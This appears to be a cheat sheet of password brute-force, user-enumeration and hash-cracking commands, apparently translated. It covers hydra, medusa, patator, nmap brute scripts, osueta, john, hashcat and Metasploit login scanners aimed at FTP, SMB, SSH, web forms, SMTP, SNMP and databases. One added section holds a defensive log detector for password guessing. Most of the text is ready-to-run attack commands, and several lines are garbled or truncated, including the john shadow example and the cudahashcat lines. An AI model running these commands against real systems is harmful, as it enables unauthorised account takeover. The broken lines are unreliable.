SMB:
enum -D -u administrator -f passwords.txt servername
FTP:
medusa -H ip.txt -U user.txt -P passwd.txt -M ftp
hydra -l username -P password_dictionary -e ns -vV IP ftp
Hydra
Crack http-proxy:
# hydra -l admin -P pass.txt http-proxy://10.36.16.18
Crack imap:
# hydra -L user.txt -p secret 10.36.16.18 imap PLAIN
# hydra -C defaults.txt -6 imap://[fe80::2c:31ff:fe12:ac11]:143/PLAIN
Crack cisco:
# hydra -P pass.txt 10.36.16.18 cisco
# hydra -m cloud -P pass.txt 10.36.16.18 cisco-enable
Crack https:
# hydra -m /index.php -l muts -P pass.txt 10.36.16.18 https
Crack teamspeak:
# hydra -l username -P password_dictionary -s port -vV IP teamspeak
Web form login
GET method, crack a web login:
# hydra -l username -P password_dictionary -t threads -vV -e ns IP http-get /admin/
# hydra -l username -P password_dictionary -t threads -vV -e ns -f IP http-get /admin/index.php
POST method, crack a web login (verification codes are not supported):
# hydra -l admin -P pass.lst -o ok.lst -t 1 -f IP http-post-form "/index.php:name=^USER^&pwd=^PASS^:<title>invalido</title>"
Description: the username is admin, the password dictionary is pass.lst, the cracked result is saved in ok.lst, -t 1 sets the number of simultaneous threads to 1, -f stops as soon as a password is cracked, and IP is the destination IP.
http-post-form means the target is a form login submitted with the HTTP POST method.
The parameters that follow are the name attributes of the corresponding form fields in the web page, and the <title> string after them is the response text that indicates a wrong guess; it can be customized.
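Seen from the server side, the -t 1 -f run described above leaves a run of failed logins for one account from one source that ends in a single success. The following added example (not from the original page) flags that pattern in an application login log; the log format, event names and the threshold of 5 are assumptions made for the example.

```python
import re
from collections import defaultdict

# Constructed sample log. The line format is an assumption for this example:
# "<ISO timestamp> <login_failed|login_ok> user=<name> src=<ip>"
SAMPLE_LOG = """\
2024-05-01T10:00:01Z login_failed user=admin src=203.0.113.7
2024-05-01T10:00:02Z login_failed user=admin src=203.0.113.7
2024-05-01T10:00:03Z login_failed user=admin src=203.0.113.7
2024-05-01T10:00:03Z login_failed user=alice src=198.51.100.20
2024-05-01T10:00:04Z login_failed user=admin src=203.0.113.7
2024-05-01T10:00:05Z login_failed user=admin src=203.0.113.7
2024-05-01T10:00:06Z login_ok user=admin src=203.0.113.7
2024-05-01T10:00:09Z login_ok user=alice src=198.51.100.20
"""

LINE_RE = re.compile(r"^(\S+) (login_failed|login_ok) user=(\S+) src=(\S+)$")


def detect_guessing(log_text, threshold=5):
    """Alert on (src, user) pairs with >= threshold consecutive failed logins.

    kind is "guessing" when the failure run reaches the threshold, and
    "guessing_then_success" when such a run is ended by a successful login,
    which is the trace a stop-on-first-hit run leaves behind.
    """
    streak = defaultdict(int)  # (src, user) -> current consecutive failures
    alerts = []
    for line in log_text.splitlines():
        m = LINE_RE.match(line.strip())
        if not m:
            continue  # skip lines that are not login events
        ts, event, user, src = m.groups()
        key = (src, user)
        if event == "login_failed":
            streak[key] += 1
            if streak[key] == threshold:
                alerts.append({"kind": "guessing", "src": src, "user": user, "ts": ts})
        else:
            if streak[key] >= threshold:
                alerts.append({"kind": "guessing_then_success", "src": src,
                               "user": user, "ts": ts, "failures": streak[key]})
            streak[key] = 0  # a success resets the run for this pair
    return alerts


if __name__ == "__main__":
    for alert in detect_guessing(SAMPLE_LOG):
        print(alert)
```

A "guessing_then_success" alert means the account's password should be treated as known to the source and reset.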
User enumeration timing attack against OpenSSH
Note: an enumeration timing attack is a side-channel attack.
A side-channel attack uses information outside the main channel, such as the speed of encryption/decryption, the voltage on chip pins, or the traffic and path of ciphertext transmission, to mount an attack; in a phrase, it is "beating around the bush."
Osueta is a Python 2 script for timing attacks against OpenSSH. It can enumerate OpenSSH user names using a timing attack and, under certain conditions, carry out a DoS attack on the OpenSSH server.
# https://github.com/c0r3dump3d/osueta
$ ./osueta.py -H 192.168.1.6 -p 22 -U root -d -v yes
$ ./osueta.py -H 192.168.10.22 -p 22 -d 15 -v yes --dos no -L userfile.txt
Crack
nmap -p 873 --script rsync-brute --script-args 'rsync-brute.module=www' 192.168.1.4    # crack rsync
nmap --script informix-brute -p 9088 192.168.1.4    # crack Informix database
nmap -p 5432 --script pgsql-brute 192.168.1.4    # crack pgsql
nmap -sU --script snmp-brute 192.168.1.4    # crack SNMP
nmap -sV --script=telnet-brute 192.168.1.4    # crack telnet
Enumerating Samba
nmblookup -A target
smbclient //MOUNT/share -I target -N
rpcclient -U "" target
enum4linux target
Enumerate SNMP
snmpget -v 1 -c public IP
snmpwalk -v 1 -c public IP
snmpbulkwalk -v2c -c public -Cn0 -Cr10 IP
# SMTP brute force (patator)
$ patator smtp_login host=192.168.1.129 user=Ololena password=FILE0 0=/usr/share/john/password.lst
$ patator smtp_login host=192.168.1.129 user=FILE1 password=FILE0 0=/usr/share/john/password.lst 1=/usr/share/john/usernames.lst
$ patator smtp_login host=192.168.1.129 helo='ehlo 192.168.17.128' user=FILE1 password=FILE0 0=/usr/share/john/password.lst 1=/usr/share/john/usernames.lst
$ patator smtp_login host=192.168.1.129 user=Ololena password=FILE0 0=/usr/share/john/password.lst -x ignore:fgrep='incorrect password or account name'
MD5 cracking (example: md5.txt file, MD5 hashes without salt)
john --format=raw-md5 --pot=./wordlist.pot md5.txt
john --format=raw-md5-opencl --wordlist=wordlist.lst --rules:Single md5.txt    (using the GPU to speed up cracking)
Hash cracking
hashcat -m 400 -a 0 hash /root/rockyou.txt    # crack the hash
Crack Linux passwords
"/etc/shadow" "/etc/shadow" -i:digits -user:test1 user1    # incremental (traversal) mode: tries all possible password combinations
Parameters:
All (0 to 8 characters long)
Alpha (all combinations of letters, 1 to 8 characters long)
Digits (all combinations of digits, 1 to 8 characters long)
Alnum (1 to 8 characters long, all letters /
-show hashes
--restore hashes: continue cracking from where the previous run stopped (question marks appear in the cracking results)
ZIP password cracking:
(1) fcrackzip brute force: 4-41 (where -b is brute force, -l describes the password length, -u is a file, -v is verbose output, -c is the password dictionary type)
oclHashcat
Whether it is an MD5, MSSQL, SHA1 or other hash, the cracking command is the same; -m sets the hash type.
Crack a WPAv2 hash: cudahashcat -m 2500 out.hccap
Crack an NTLM hash: cudahashcat +
Some brute-force modules in Metasploit
auxiliary/scanner/mssql/mssql_login
auxiliary/scanner/ftp/ftp_login
auxiliary/scanner/ssh/ssh_login
auxiliary/scanner/telnet/telnet_login
auxiliary/scanner/smb/smb_login
auxiliary/scanner/mysql/mysql_login
auxiliary/scanner/oracle/oracle_login
auxiliary/scanner/postgres/postgres_login
auxiliary/scanner/vnc/vnc_login
auxiliary/scanner/pcanywhere/pcanywhere_login
auxiliary/scanner/snmp/snmp_login
Brute Force hack